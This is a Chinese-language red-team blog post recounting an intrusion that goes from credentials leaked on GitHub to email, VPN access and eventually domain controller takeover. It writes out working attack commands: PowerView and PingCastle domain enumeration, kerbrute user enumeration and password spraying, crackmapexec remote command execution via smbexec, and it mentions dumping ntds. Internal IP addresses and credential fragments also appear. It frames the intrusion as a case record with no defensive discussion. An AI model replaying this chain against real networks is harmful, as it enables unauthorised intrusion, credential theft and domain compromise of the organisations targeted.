从 Github 泄露到拨入 V*N 拿到域控

  • A+
所属分类:安全文章

渗透攻击红队

一个专注于红队攻击的公众号

从 Github 泄露到拨入 V*N 拿到域控


大家好,这里是 渗透攻击红队 的第 60 篇文章,本公众号会记录一些红队攻击的案例,不定时更新


从 Github 泄露到拨入 V*N 拿到域控
前言


目标资产信息搜集的程度,决定渗透过程的复杂程度。

目标主机信息搜集的深度,决定后渗透权限持续把控。

渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。



信息搜集

Github 信息搜集


对于 Github 很多 xdm 都是用来搜索 exp,poc ... ,其实 Github 上很多东西都能够为我们红队人员所利用,比如本篇通过 Github 泄露账号信息,拨入内网拿到域控。

首先通过 Github 搜索目标资产找到了目标的资产下的账号密码:

从 Github 泄露到拨入 V*N 拿到域控

通过下载到本地,直接用泄露的 user、pass 登陆到目标邮件系统:

从 Github 泄露到拨入 V*N 拿到域控

此时通过翻阅邮件内的消息找到了 V*N 的账号密码,并成功拨入 V*N: 

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

随后直接进内网:

从 Github 泄露到拨入 V*N 拿到域控

发现域控判断该域控为 xx 的域控,为子域控!

从 Github 泄露到拨入 V*N 拿到域控

通过对该子域控进行信息搜集发现了 web 服务:

<a class="FloatLeft Nav" href="http://172.16.172.121:7000/">统一身份认证管理</a><!--xxxxx,passwrod--> 

通过域内用户枚举和密码喷洒攻击(Password Spraying)成功登陆:

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

继续进行内网资产发现主域控CN=xxxx-DC-2ND.xxxx.com.cn  172.16.172.81   12-34-56-78-9A-BC xxxx-DC-2nd.xxxx.com.cn [Win 2016 Standard 14393]CN=xxxx-DC-1ST.xxxx.com.cn  172.16.172.80   12-34-56-78-9A-BC xxxx-DC-1st.xxxx.com.cn [Win 2016 Standard 14393]
子域控Found 172.16.172.82 IS_LDAP  172.16.172.82   12-34-56-78-9A-BC xxxx-JG-DC-1st.aaaa.xxxx.com.cn [Win 2016 Standard 14393]Found 172.16.172.81 IS_LDAPFound 172.16.172.83 IS_LDAP 172.16.172.83 12-34-56-78-9A-BC xxxx-JG-DC-2nd.aaaa.xxxx.com.cn [Win 2016 Standard 14393]

直接通过凭证连接:

从 Github 泄露到拨入 V*N 拿到域控

连接到总部:

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

通过ldap导出机器,用户,域管,dc

Powerview 导出:
Get-NetDomainTrust -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $credGet-NetGroup -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name > group.txtGet-NetComputer -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl nameGet-NetUser -Domain xxxx.com.cn -DomainController 172.16.172.80 -ADSpath "LDAP://DC=xxxx,DC=com,DC=cn" -Credential $cred | fl name
PingCastle.exe --server 172.16.172.80 --user xxxxADadmin --password xxxx --protocol ADWSThenLDAP --healthcheck --explore-trust --explore-forest-trust

从 Github 泄露到拨入 V*N 拿到域控

针对域内用户,进行密码喷洒,尝试看看有没有相同的,通过域内用户枚举和密码喷洒攻击(Password Spraying) 发现有问题,暂时不用!

接下来的思路通过域外枚举域内:

kerbrute_windows_amd64.exe userenum --dc 172.16.172.80  -d xxxx.com.cn user.txtkerbrute_windows_amd64.exe passwordspray --dc 172.16.172.80  -d xxxx.com.cn user.txt xxxx

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控
拿到域管后:

crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 172.16.172.0/24crackmapexec.exe -d rootkit -u administrator -p [email protected]#45 -t 1 192.168.3.144 --execm smbexec -x "whoami /user"crackmapexec.exe -d xxxx -u ADadmin -p xxxx -t 10 ip.txt --execm smbexec -x "whoami /user"

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

从 Github 泄露到拨入 V*N 拿到域控

进入内网,上线直接横向域控,导出 ntds ... ... 至此域已经拿下,本次渗透结束!


从 Github 泄露到拨入 V*N 拿到域控

渗透攻击红队

一个专注于渗透红队攻击的公众号

从 Github 泄露到拨入 V*N 拿到域控



从 Github 泄露到拨入 V*N 拿到域控
点分享
从 Github 泄露到拨入 V*N 拿到域控
点点赞
从 Github 泄露到拨入 V*N 拿到域控
点在看

本文始发于微信公众号(渗透攻击红队):从 Github 泄露到拨入 V*N 拿到域控

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: